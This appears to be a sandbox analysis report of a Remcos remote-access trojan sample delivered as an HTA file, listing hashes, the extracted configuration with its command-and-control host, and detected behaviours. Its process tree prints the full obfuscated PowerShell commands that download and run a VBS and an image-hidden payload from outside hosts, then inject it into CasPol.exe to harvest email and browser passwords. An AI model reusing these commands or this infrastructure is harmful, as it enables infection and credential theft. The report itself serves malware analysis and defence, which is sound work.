remcos | 5c9cb60a6bf32648964076e620fe9560ead5fb09ab9b8017667daa13b88ce5c6

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
07-02-2025 05:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mydreamgirlsheismybestgirleveriseenwithherlovergood.hta
Size

15KB
MD5

fae5ca5adff365408b3e3054c123c681
SHA1

d6477f5d534c121bc0fff71f050e311526d9e5f3
SHA256

5c9cb60a6bf32648964076e620fe9560ead5fb09ab9b8017667daa13b88ce5c6
SHA512

6744d1ea402c690df3db54db55a007be8c50426ee23943ab6c518861e79838f1d1c829b2890fb4ebed8ed79bc49f4fc47647ce1d0192fb284a207471165f4d6e
SSDEEP

96:dunKunqqFzsff/FbcorJFmqei+UunzunJ6unx+:8ZqUs39bsi+TavA

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

gamdaan.duckdns.org:2345

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-1FQVIE
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/3668-105-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/8-104-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/3944-111-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/3668-105-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/8-104-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
23	4028	powershell.exe
26	4348	powershell.exe
27	4348	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
4028	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4348	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4348 set thread context of 4564	4348	powershell.exe	101
PID 4564 set thread context of 8	4564	CasPol.exe	103
PID 4564 set thread context of 3668	4564	CasPol.exe	105
PID 4564 set thread context of 3944	4564	CasPol.exe	107

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4028	powershell.exe
4028	powershell.exe
4348	powershell.exe
4348	powershell.exe
8	CasPol.exe
8	CasPol.exe
3944	CasPol.exe
3944	CasPol.exe
8	CasPol.exe
8	CasPol.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
4564	CasPol.exe
4564	CasPol.exe
4564	CasPol.exe
4564	CasPol.exe
4564	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeDebugPrivilege	3944	CasPol.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 2960 wrote to memory of 2688	2960	mshta.exe	86
PID 2960 wrote to memory of 2688	2960	mshta.exe	86
PID 2960 wrote to memory of 2688	2960	mshta.exe	86
PID 2688 wrote to memory of 4028	2688	cmd.exe	89
PID 2688 wrote to memory of 4028	2688	cmd.exe	89
PID 2688 wrote to memory of 4028	2688	cmd.exe	89
PID 4028 wrote to memory of 3844	4028	powershell.exe	92
PID 4028 wrote to memory of 3844	4028	powershell.exe	92
PID 4028 wrote to memory of 3844	4028	powershell.exe	92
PID 3844 wrote to memory of 4828	3844	csc.exe	93
PID 3844 wrote to memory of 4828	3844	csc.exe	93
PID 3844 wrote to memory of 4828	3844	csc.exe	93
PID 4028 wrote to memory of 3336	4028	powershell.exe	97
PID 4028 wrote to memory of 3336	4028	powershell.exe	97
PID 4028 wrote to memory of 3336	4028	powershell.exe	97
PID 3336 wrote to memory of 4348	3336	WScript.exe	98
PID 3336 wrote to memory of 4348	3336	WScript.exe	98
PID 3336 wrote to memory of 4348	3336	WScript.exe	98
PID 4348 wrote to memory of 4564	4348	powershell.exe	101
PID 4348 wrote to memory of 4564	4348	powershell.exe	101
PID 4348 wrote to memory of 4564	4348	powershell.exe	101
PID 4348 wrote to memory of 4564	4348	powershell.exe	101
PID 4348 wrote to memory of 4564	4348	powershell.exe	101
PID 4348 wrote to memory of 4564	4348	powershell.exe	101
PID 4348 wrote to memory of 4564	4348	powershell.exe	101
PID 4348 wrote to memory of 4564	4348	powershell.exe	101
PID 4348 wrote to memory of 4564	4348	powershell.exe	101
PID 4348 wrote to memory of 4564	4348	powershell.exe	101
PID 4564 wrote to memory of 8	4564	CasPol.exe	103
PID 4564 wrote to memory of 8	4564	CasPol.exe	103
PID 4564 wrote to memory of 8	4564	CasPol.exe	103
PID 4564 wrote to memory of 8	4564	CasPol.exe	103
PID 4564 wrote to memory of 932	4564	CasPol.exe	104
PID 4564 wrote to memory of 932	4564	CasPol.exe	104
PID 4564 wrote to memory of 932	4564	CasPol.exe	104
PID 4564 wrote to memory of 3668	4564	CasPol.exe	105
PID 4564 wrote to memory of 3668	4564	CasPol.exe	105
PID 4564 wrote to memory of 3668	4564	CasPol.exe	105
PID 4564 wrote to memory of 3668	4564	CasPol.exe	105
PID 4564 wrote to memory of 4748	4564	CasPol.exe	106
PID 4564 wrote to memory of 4748	4564	CasPol.exe	106
PID 4564 wrote to memory of 4748	4564	CasPol.exe	106
PID 4564 wrote to memory of 3944	4564	CasPol.exe	107
PID 4564 wrote to memory of 3944	4564	CasPol.exe	107
PID 4564 wrote to memory of 3944	4564	CasPol.exe	107
PID 4564 wrote to memory of 3944	4564	CasPol.exe	107

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mydreamgirlsheismybestgirleveriseenwithherlovergood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2960
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOWeRshell -ex byPasS -nOP -W 1 -C dEVicecRedentIALdeplOYmeNT ; iex($(IEX('[systEM.tExT.eNcoDinG]'+[chAr]58+[Char]0X3A+'UTf8.geTsTRiNG([sysTem.cOnverT]'+[chAr]0X3a+[Char]0x3a+'fROMbasE64sTRINg('+[ChaR]0X22+'JFVDREJ1cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJkRWZpTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIUGpHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhFV05uLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGR4aXJmdEQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdvYkZtQUdlaVBQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWGR0a3NqaUN2YiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE9paXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVDREJ1cDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE1LjIzNS4yMDMuMjEyLzU0MzMvbXlkcmVhbWdpcmxzaGVpc215YmVzdGdpcmxldmVyaXNlZW53aXRoaGVybG92ZXJnb29kLmdJRiIsIiRFTlY6QVBQREFUQVxteWRyZWFtZ2lybHNoZWlzbXliZXN0Z2lybGV2ZXJpc2VlbndpdGhoZXJsb3Zlcmdvby52YnMiLDAsMCk7c1RBclQtc0xFRXAoMyk7SU5WT2tFLUl0RW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG15ZHJlYW1naXJsc2hlaXNteWJlc3RnaXJsZXZlcmlzZWVud2l0aGhlcmxvdmVyZ29vLnZicyI='+[cHar]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWeRshell -ex byPasS -nOP -W 1 -C dEVicecRedentIALdeplOYmeNT ; iex($(IEX('[systEM.tExT.eNcoDinG]'+[chAr]58+[Char]0X3A+'UTf8.geTsTRiNG([sysTem.cOnverT]'+[chAr]0X3a+[Char]0x3a+'fROMbasE64sTRINg('+[ChaR]0X22+'JFVDREJ1cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJkRWZpTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIUGpHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhFV05uLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGR4aXJmdEQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdvYkZtQUdlaVBQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWGR0a3NqaUN2YiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE9paXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVDREJ1cDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE1LjIzNS4yMDMuMjEyLzU0MzMvbXlkcmVhbWdpcmxzaGVpc215YmVzdGdpcmxldmVyaXNlZW53aXRoaGVybG92ZXJnb29kLmdJRiIsIiRFTlY6QVBQREFUQVxteWRyZWFtZ2lybHNoZWlzbXliZXN0Z2lybGV2ZXJpc2VlbndpdGhoZXJsb3Zlcmdvby52YnMiLDAsMCk7c1RBclQtc0xFRXAoMyk7SU5WT2tFLUl0RW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG15ZHJlYW1naXJsc2hlaXNteWJlc3RnaXJsZXZlcmlzZWVud2l0aGhlcmxvdmVyZ29vLnZicyI='+[cHar]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4028
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mufgnusm\mufgnusm.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3844
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9134.tmp" "c:\Users\Admin\AppData\Local\Temp\mufgnusm\CSCAB89E12FEF89483CA0415753961601D.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4828
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mydreamgirlsheismybestgirleveriseenwithherlovergoo.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3336
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAG8AZwByAGUAdgBvAGwAcgBlAGgAaAB0AGkAdwBuAGUAZQBzAGkAcgBlAHYAZQBsAHIAaQBnAHQAcwBlAGIAeQBtAHMAaQBlAGgAcwBsAHIAaQBnAG0AYQBlAHIAZAB5AG0ALwAzADMANAA1AC8AMgAxADIALgAzADAAMgAuADUAMwAyAC4ANQAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQAIAA9ACAAJABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABnAG8AaAB1ADcAcwBsAHgALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMAOAA4ADQANQAwADAANAAvAGsAZAB4AHoAbQBlAHkAbAA0ADEAZgAxAHMAcwBtAHkAaAA0AGEAeAAuAGoAcABnACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4348
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:4564
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\uyyctgmbrpobgdrwytfqkuvintwsybctri"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:8
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\eaduuzx"
        7⤵
        
        PID:932
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\eaduuzx"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:3668
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\hvqfurhwaf"
        7⤵
        
        PID:4748
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\hvqfurhwaf"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
a69c22b6b56c19eca9858c5cb46eb9f1

SHA1
590fe7710f87f4261fefd281cef8020865fad3a3

SHA256
286156649451e03021fa151bc55c616e1e2a10a7f097ae0b0b777391163efff6

SHA512
caba44d328d626ffbfeb2b453b10e5216feecb84222ea76b87d56f1f98b80a16cdb8ae48356cee615a1aeac27b5c7925fdc01dd79e276e2aa9e238f2d8c904bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9134.tmp

Filesize
1KB

MD5
f8abbee81d49304e469e0f2736372591

SHA1
841d046cf38a253abffdfb3a6ead237650fbe26f

SHA256
3e3a5075504384b8babb3d0f7a80ec68a679bad158e86e8f4c52b4bc79fb94f5

SHA512
d980f13cfa612372649b1929f05d75101dc3874e9dc09461a88cb0c323deaacf07bda276b808a8059fecd8964be466a42f2d5fd0ca93703000c7b92f108902b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4qzbkidf.bvl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\mufgnusm\mufgnusm.dll

Filesize
3KB

MD5
3b94651d00532b4cdf1beddf75efb83a

SHA1
a3087bb38c4f047c9b027de48e59b8ad23e87a4d

SHA256
490256516a4e88ec315a68b36a64fc76431bba318d68f3c33d683315a867b3fb

SHA512
162199ac6df15ab567e86f13c787b36b01c3c18f6195f6791cd427b0d8e25fc667e5db9ac9842ecaae920e89d49a92f50ceef2430dc2fe6c61da2c5afcbdc82b

Download Submit
C:\Users\Admin\AppData\Local\Temp\uyyctgmbrpobgdrwytfqkuvintwsybctri

Filesize
4KB

MD5
9e5ec1757ae6d0ed06f7638e7d459f4b

SHA1
39940a4c316a4b03d48ebb41b87882cc61166fc7

SHA256
a0ece6f3f4061e719159d291070eee90083843be16a0fac632b5cec27b4510f5

SHA512
338168d274b67a4766eb29bac1dfaf193c7b5f9c1c3ce2fe09563253cf54fef2f3a93753480f9774938c759e33abb59c757729f40a5e0f3a7903532c23a582cf

Download Submit
C:\Users\Admin\AppData\Roaming\mydreamgirlsheismybestgirleveriseenwithherlovergoo.vbs

Filesize
185KB

MD5
88381fe4eced12ab51b61b701655dfc4

SHA1
363e0d60930acafa210f5f9123f4a935fe8b32f2

SHA256
544f1930b15b1ad1efc93e230a48aa877044acdac4d42e15dd4f3b293eb4b1ae

SHA512
89389de03393aab55f6d016a99c94a8e005b9b3da233d7305f7df90432ec130ac70a0d5d3ac44adb620dad7dfb897511328c1fd747a83472284e94d992d773bb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mufgnusm\CSCAB89E12FEF89483CA0415753961601D.TMP

Filesize
652B

MD5
10614b82456ca3b7bb5728953024e4e5

SHA1
6e6c092450e80e2214866e6b4836b251f425303e

SHA256
d909cc81489a2d181cfc331329d778c903d83e5116dc4910423161f0dfdbb9bb

SHA512
93110327b377d0e32b250ba6c338dc6d3c39448343c31fa0dfc0771f090b2f2b9f899a31474359ebb3c05a27dee1c1a126acb408f8a277e4159482de230b8681

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mufgnusm\mufgnusm.0.cs

Filesize
481B

MD5
3d85a0a117fb394a23636614a6bed698

SHA1
d1bd8ef2834bc9eccee2985192067441a8988974

SHA256
bed32737b1920c7ab8195497a0b2db0763a67a9b23561c2e5b68fe3d295edaff

SHA512
59a405e2fa77fecc7163e02b11c64a8f08f744392d712c6a6e08194d6dee41d8af64fbef08dc6e3f18e43cb3636aff4d8c25596d3bfeefbe80df8fb726e3f0dc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mufgnusm\mufgnusm.cmdline

Filesize
369B

MD5
f54b15d9e7d037a18af6b0ad07e7001e

SHA1
4274ed2e0a41402801ef8ac04331f7dc62d6131d

SHA256
dd8c0c406e108a407e4d744bb9bf6ac829665c26b29cdeceacf0cc49ec36bee7

SHA512
e69670597f04e6fd1519ef28e185a1251834f178dc46cec9de6622684669b6c11ccfc2064319438fbe5214fbfa6eab04c53ef5c168cde4891efa385cb38d4842

Download Submit
memory/8-102-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/8-104-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/8-100-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3668-103-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3668-105-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3668-101-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
